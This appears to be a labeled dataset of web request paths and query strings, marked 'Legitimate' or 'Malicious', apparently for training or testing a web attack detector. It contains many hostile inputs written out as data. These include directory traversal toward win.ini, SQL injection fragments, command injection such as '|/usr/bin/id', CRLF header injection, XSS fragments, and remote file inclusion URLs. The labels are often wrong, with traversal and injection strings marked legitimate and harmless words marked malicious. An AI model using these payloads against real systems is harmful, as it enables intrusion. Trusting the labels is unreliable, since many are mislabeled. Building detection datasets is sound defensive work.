Legitimate: //%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini
Legitimate: //%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/windows/win.ini
Legitimate: //..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini
Legitimate: //................windows/win.ini
Legitimate: /admin/config.php?handler=file&module=dashboard&file=dashboard.css
Legitimate: /blitz-document/
Legitimate: /cgi-bin/where.pl?sd=ls /etc
Legitimate: /document-library/
Legitimate: /document-viewer/
Legitimate: /document_001/
Legitimate: /document_collaboration/
Legitimate: /document_imaging/
Legitimate: /document_integration/
Legitimate: /document_protection/
Legitimate: /document_types/
Legitimate: /document_verifi/
Legitimate: /en-us/api/search/jobs?s=1331892428.4&s=1331892428.5&s=1331892428.7&s=1331892428.8&s=1331892428.9&s=1331892429.15&s=1331892429.16&s=1331892429.17
Legitimate: /ewebquiz.asp?quizid=1 or 1=1
Legitimate: /forged_document/
Legitimate: /forum.php?forum=-1 union select password,password,null,null from test_mysql_injection where uid=1/*
Legitimate: /iso_document/
Legitimate: /javascript/scripts.c
Legitimate: /javascript/scripts.cnf
Legitimate: /javascript/scripts.cpp
Legitimate: /javascript/scripts.doc
Legitimate: /javascript/scripts.jhtml
Legitimate: /javascript/scripts.meta
Legitimate: /javascript/scripts.pem
Legitimate: /javascript/scripts.pl
Legitimate: /javascript/scripts.rb
Legitimate: /javascript/scripts.sh
Legitimate: /michael moore - pets or meat sequel to roger and me/
Legitimate: /modules.php?op=modload&name=sections&file=index&req=viewarticle&artid=
Legitimate: /order/order_log.dat
Legitimate: /phpmyadmin//%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini
Legitimate: /phpmyadmin//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/windows/win.ini
Legitimate: /phpmyadmin//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini
Legitimate: /phpmyadmin//..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/windows/win.ini
Legitimate: /search.php?1,search= ,page=1,match_type=all,match_dates=30,match_forum=all,body=1,author=1,subject=1,&forum_ids[]=-99)/**/generate_sql_error
Legitimate: /static//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini
Legitimate: /structured-document/
Legitimate: /thebox/admin.php?act=write&adpass=admin&aduser=admin&password=admin&username=admin
Legitimate: /thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin
Legitimate: /tutos/file/file_select.php
Legitimate: /v3_document/
Malicious: %0Aid
Malicious: %0a id %0a
Malicious: %0d%0aX-Injection-Header:%20AttackValue
Malicious: %20union%20/*!select*/%20/*!@@datadir*/
Malicious: %250a
Malicious: %99999999999s
Malicious: &#000060
Malicious: &#0060
Malicious: &#X000003c
Malicious: &#X00003C
Malicious: &#X00003c
Malicious: &#X0003C
Malicious: &#X0003E
Malicious: &#X003E
Malicious: &#X003e
Malicious: &#X03C
Malicious: &#X03c
Malicious: &#x000003C
Malicious: &#x00003C
Malicious: &#x0003c
Malicious: &#x03c
Malicious: &#x3c
Malicious: (select top 1
Malicious: (sqlvuln)
Malicious: ..%u2216
Malicious: /%2e%2e%2f%2e%2e%2f{FILE}
Malicious: /..%2f{FILE}
Malicious: /../.sln
Malicious: /..\pixfir~1\how_to_login.html
Malicious: /./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}
Malicious: /.\/\.\{FILE}
Malicious: ////%2e%2e%2f%2e%2e%2f{FILE}
Malicious: ////%2e%2e%2f{FILE}
Malicious: //_mmserverscripts/mmhttpdb.php
Malicious: /052004transcript/
Malicious: /0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}
Malicious: /0x2e0x2e0x2f0x2e0x2e0x2f{FILE}
Malicious: /0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}
Malicious: /2003transcripts/
Malicious: /382-publishersdescription/
Malicious: /<20050914235232/
Malicious: /<20060328210627/
Malicious: /[seccheck]/../../ext.ini
Malicious: /_mmserverscripts/mmhttpdb.asp
Malicious: /_scriptlibrary/
Malicious: /accessplatform/auth/clientscripts/
Malicious: /acidscriptv1/
Malicious: /aixssh/
Malicious: /aladdinghostscript/
Malicious: /aminscript/
Malicious: /applescript_experience/
Malicious: /as_noscript/
Malicious: /basexssl/
Malicious: /bdaysubscriptions/
Malicious: /beef/js/scriptaculous.js
Malicious: /buyvaliumswithoutprescription/
Malicious: /campaignprescriptionforchange/
Malicious: /careerdescription/
Malicious: /cat-scripte/
Malicious: /ccscript/
Malicious: /cgi-script/
Malicious: /cgiscripts/
Malicious: /checkuserscript/
Malicious: /chpasswd/
Malicious: /citrix//accessplatform/auth/clientscripts/cookies.js
Malicious: /confirmunsubscription.php?output=http://192.168.202.96:8080/no4ghqiguzhst?
Malicious: /confirmunsubscription.php?output=http://192.168.202.96:8080/swgnhpydbq0t?
Malicious: /conscripted_gifts/
Malicious: /conscription_gifts/
Malicious: /conscripts_gifts/
Malicious: /core/admin/categories_add.php?absoluteurlXXpathXX
Malicious: /core/admin/pgRSSnews.php?absoluteurlXXpathXX
Malicious: /course_descriptions/
Malicious: /crosssitescripting/
Malicious: /databasesubscriptions/
Malicious: /descriptive/
Malicious: /descriptor/
Malicious: /domscripting/
Malicious: /dvscript/
Malicious: /elseif/moduleajouter/depot/usrdepot.php?corpsdesignXXpathXX
Malicious: /emailsubscription/
Malicious: /emailsubscriptionservice/
Malicious: /en-us/manager/permissions/launcher/data/ui/nav/default?uri=/servicesns/nobody/xss/data/ui/nav/default
Malicious: /en-us/manager/search/data/inputs/script
Malicious: /en-us/manager/search/data/inputs/script/_new?action=edit&ns=search
Malicious: /encodingdescriptions/
Malicious: /eventstranscripts/
Malicious: /examples/jsp/colors/remindpasswd
Malicious: /fastscripts2/
Malicious: /forgotpasswd/
Malicious: /genpasswd/
Malicious: /genscript/
Malicious: /goboscripts/
Malicious: /greasemonkeyscriptforsmalltitles/
Malicious: /grid_subscriptions2/
Malicious: /helpnoscript_cds2/
Malicious: /how_to.../
Malicious: /htmlscript/
Malicious: /inetisscripts/
Malicious: /inscripta-rib/
Malicious: /javascript/.htaccess/skipfish://invalid/;?
Malicious: /javascript/document.bak
Malicious: /javascript/document.bz2
Malicious: /javascript/document.cfm
Malicious: /javascript/document.do
Malicious: /javascript/document.fcgi
Malicious: /javascript/document.htm
Malicious: /javascript/document.jsf
Malicious: /javascript/document.mdb
Malicious: /javascript/document.properties
Malicious: /javascript/document.rar
Malicious: /javascript/document.save
Malicious: /javascript/document.sfish
Malicious: /javascript/document.shtml
Malicious: /javascript/document.swf
Malicious: /javascript/document.vbs
Malicious: /javascript/document.xsl
Malicious: /javascript/document.zip
Malicious: /javascript/htpasswd.ini
Malicious: /job descriptions/
Malicious: /jobdescriptionandsalary/
Malicious: /jscript.php?my_ms[root]=http://192.168.202.118:8080/ghl9il??
Malicious: /jscript/
Malicious: /jscriptpr2/
Malicious: /jscripts/
Malicious: /maillistsubscription/
Malicious: /mailpasswd/
Malicious: /main.inc.php?pathtoscript=@rfiurl
Malicious: /medical-transcription/
Malicious: /metranscript/
Malicious: /mod_membre/inscription.php?chemin=@rfiurl?chemin=@rfiurl?
Malicious: /myscript-notes/
Malicious: /myspacewormnewxss/
Malicious: /newslettersubscription/
Malicious: /newslettersubscriptions/
Malicious: /nispasswd/
Malicious: /noprescriptionphentermine/
Malicious: /noscript-11/
Malicious: /oldtranscripts/
Malicious: /onlinesubscription_off/
Malicious: /opensearchdescription/
Malicious: /order/login.php?svr_rootscript=@rfiurl
Malicious: /order/login.php?svr_rootscript=http://192.168.202.118:8080/ghl9il?
Malicious: /order/login.php?svr_rootscript=http://192.168.202.118:8080/moclyxlwqyfjnp?
Malicious: /order/login.php?svr_rootscript=http://192.168.202.118:8080/zz5thkvtmlgl?
Malicious: /pandascript/
Malicious: /parltranscript050704en/
Malicious: /passwdfile
Malicious: /playerscript/
Malicious: /postscript/
Malicious: /postscriptbarcode/
Malicious: /prescriptions/
Malicious: /prescriptionviagra/
Malicious: /prescriptionxanax/
Malicious: /prescriptives-coupons/
Malicious: /primalscript/
Malicious: /printsubscription/
Malicious: /pro-script/
Malicious: /pyconpostmortemirctranscript/
Malicious: /radioscripts/
Malicious: /regsyssubscriptioncnt/
Malicious: /renewsubscription/
Malicious: /riskmodeldescription/
Malicious: /rmscript/
Malicious: /rubyscript2exe/
Malicious: /s-csscript/
Malicious: /sarboxonlineseminartranscript/
Malicious: /saviotranscript/
Malicious: /scaffoldscript/
Malicious: /script19/
Malicious: /scriptableinpython/
Malicious: /scriptaculous/
Malicious: /scriptcenter/
Malicious: /scriptextensions/
Malicious: /scriptforge/
Malicious: /scriptingnews2/
Malicious: /scriptingnewsinxml/
Malicious: /scriptkiddies/
Malicious: /scriptler/
Malicious: /scriptlogic 6/
Malicious: /scriptpad/
Malicious: /scripts/rest/api/2/serverinfo
Malicious: /scripts/settings/site.ini
Malicious: /scripts/tst.bat|type c:\windows\win.ini
Malicious: /scripts/tst.bat|type c:\winnt\win.ini
Malicious: /scriptsadmin/index.php
Malicious: /scriptsentry/
Malicious: /scripture_gifts/
Malicious: /scripturetableware/
Malicious: /scriptz/
Malicious: /scriptztemplatez/
Malicious: /secure_scripting/
Malicious: /serverscripts/
Malicious: /setpasswd.cgi
Malicious: /shell-scripting/
Malicious: /shellscripts/
Malicious: /snowboardingxssmallicon/
Malicious: /somepagewithxss/
Malicious: /sscript/
Malicious: /ssxmagazinesubscription/
Malicious: /subscription2/
Malicious: /subscription_new/
Malicious: /subscriptionlanding/
Malicious: /subscriptionmailsignup/
Malicious: /subscriptionoptions/
Malicious: /subscriptions.ini
Malicious: /subscriptionservices/
Malicious: /subscriptiont1/
Malicious: /subscriptiontab/
Malicious: /subscriptors/
Malicious: /sudoscriptd/
Malicious: /superduperdescription/
Malicious: /superscript/
Malicious: /sysuser/docmgr/iecreate.stm?template=../
Malicious: /sysuser/docmgr/ieedit.stm?url=../
Malicious: /technetwebcastwhatsnewinscriptingforwindows2003/
Malicious: /templates/prescription/
Malicious: /trackdescriptions/
Malicious: /transcript050506/
Malicious: /transcription-r0/
Malicious: /ttxssh2_100beta1/
Malicious: /ttxssh2_107/
Malicious: /undocumentedscripts/
Malicious: /usingascripttoaddadomainusertoalocalgroup/
Malicious: /viagraprescription/
Malicious: /virus_descriptions/
Malicious: /vubbxss/
Malicious: /webscarabxss/
Malicious: /whysubscriptions/
Malicious: /windows admin scripting little black book/
Malicious: /writingscripts/
Malicious: /xmlforscript/
Malicious: /xssanatomy/
Malicious: /xssflash/
Malicious: /xssproxy/
Malicious: /xssthreat/
Malicious: /zeroblogxss/
Malicious: /zipwise field descriptions/
Malicious: 1+and+1=1
Malicious: 1.7976931348623157e+308
Malicious: 268435455
Malicious: <video poster=javascript:javascript:alert(1)//
Malicious: AND 1=0
Malicious: C:/inetpub/wwwroot/global.asa
Malicious: HAVING 1=0--
Malicious: OR 1=1--
Malicious: PRINT
Malicious: \u003C
Malicious: \x27\x4F\x52 SELECT *
Malicious: \x3D \x27
Malicious: `ping 127.0.0.1`
Malicious: alert
Malicious: dir%00
Malicious: exec xp
Malicious: having 1=1--
Malicious: id%00
Malicious: or 0=0 --
Malicious: or 1=1 /*
Malicious: or 1=1--
Malicious: other
Malicious: password:*/=1--
Malicious: pg_sleep(__TIME__)--
Malicious: procedure
Malicious: select
Malicious: |/usr/bin/id
Malicious: ‘ or 3=3 --
